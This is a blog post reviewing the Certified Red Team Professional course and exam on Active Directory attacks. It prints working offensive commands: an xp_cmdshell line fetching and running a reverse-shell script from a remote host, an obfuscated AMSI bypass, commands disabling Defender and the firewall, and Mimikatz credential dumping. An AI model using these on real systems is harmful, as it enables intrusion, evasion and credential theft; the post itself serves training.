Recently I passed the Certified Red Team Professional (CRTP) which was an excellent course provided by Pentester Academy. The course is focused on Active Directory hacking but instead of using Kali we instead use a Windows box to priv esc and move around the AD network with the help of PS Remoting mainly.

The best part about this course is we are working in an environment with MS Defender and AMSI scanning in place so although being stealthy (aka Red Teaming) isn’t a requirement it is necessary to bypass these restrictions. You have the option to use Kali at times but I chose to use the provided Windows VM the whole time for a change from the OSCP.

The course consists of the following sections but to be honest for the exam the ‘Defenses’ topics aren’t required:

• Active Directory Enumeration
• Local Privilege Escalation
• Domain Privilege Escalation
• Domain Persistence and Dominance
• Cross Trust Attacks
• Forest Persistence and Dominance
• Defenses – Monitoring
• Defenses and bypass – Architecture and Work Culture Changes
• Defenses and Bypass – Deception
• Defenses and Bypass – PowerShell

Enumeration

Throughout the enumeration section you have the choice to use the ActiverDirectory Module or PowerView but I chose the latter created by Will Schroeder aka @harmj0y which is an amazing tool.

PowerView contains some useful features such as Invoke-UserHunter which can find computers where specified users or groups have a current session as well as Find-LocalAdminAccess whereby it searches the domain looking for machines that the current user has local admin access to.

The other tool that stands out is the one named PowerUpSQL which scans the domain looking for SQL servers that may be accessible. The first command I would run would be this to provide general enumeration of the SQL Servers:

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

I would then do a more specific search to see if the returned SQL servers from the above command link to any further SQL Servers which can be achieved by using SQLServerLinkCrawl:

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose

This would normally tell you if you are sysadmin on any of the SQL servers and if you are you could potentially enable xp_cmdshell and get a reverse shell on the SQL server itself with:

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (iwr http://172.16.100.1:80/Invoke-PowerShellTcpEx.ps1 -UseBasicParsing)"'

Privilege Escalation

One of the key things when going from box to box I learned is how to disable AMSI and also open up the firewall and disable real-time monitoring to alow me to use my Priv Esc tools. These were the two Powershell commands I ran each time which might be useful for others:

Bypass AMSI:

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Disable AV & Open Firewall:

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;Set-MpPreference -DisableIOAVProtection $true;Set-MpPreference -DisableRealtimeMonitoring $true

For Priv Esc I used PowerUp and Mimikatz mainly when I had the privileges. The key to using these was to try and not touch disk too and to run them in memory to avoid AV.

Lateral Movement

I think the highlight of the course is the use of PS Remoting to laterally move from machine to machine. Running commands like this becomes second nature after awhile and this wasn’t a massive feature of the OSCP so was great to get the experience in using it:

Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Also being able to create a PowerShell session, store it in a variable, then call Mimikatz locally and passing Mimikatz to the session was such a great technique to use:

$sess = New-PSSession -Computername Server1
Invoke-Command -Session $sess -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Other Topics

The course also delves into lots of other tips and tricks such as Golden\Silver tickets, Kerberoasting, Unconstrained Delegation, Skeleton keys, ACL abuse etc etc but they would be too numerous to cover here. It is suffice to say that you come away from the course with a lot more knowledge of Active Directory than other courses provide.

Exam

I started the exam at 10am and began making my way through the machines on the network and had cracked them all by midnight. I won’t give away too much to avoid spoilers but I think I may have underestimated how difficult it was going to be and there were sections like going from machine 3 to 4 which were particularly tricky for me conceptually to perform.

I do think overall the exam was fair and if you know the course well you should pass it without problems. By well I mean if a command was only shown once in the course just remember that it exists and don’t overlook the minor things.